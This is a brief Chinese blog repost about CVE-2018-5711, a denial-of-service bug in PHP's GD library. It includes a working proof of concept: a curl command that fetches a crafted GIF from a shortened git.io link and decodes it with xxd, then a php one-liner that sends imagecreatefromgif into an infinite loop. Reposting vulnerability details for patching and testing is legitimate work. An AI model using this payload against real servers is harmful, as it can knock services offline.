阿里云發布的PHP高危漏洞

這肯定要修補啊，官方解決方案就是升級到最新版

升級過程就不說了
編譯----安裝
期間各種BUG，很惡心

事后，覺得這漏洞還挺好，就給大家轉載下
有時間的可以自己測試下
不要搗蛋哦，小朋友們

PoC

下載搗蛋文件
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif

本機函數測試
$ php -r 'imagecreatefromgif("poc.gif");'

結果自循環，請使用ctrl+c
Infinite loop here...

轉載于:https://blog.51cto.com/kevinzhang91/2070078

總結

以上是生活随笔為你收集整理的CVE-2018-5711:PHP GD库拒绝服务漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。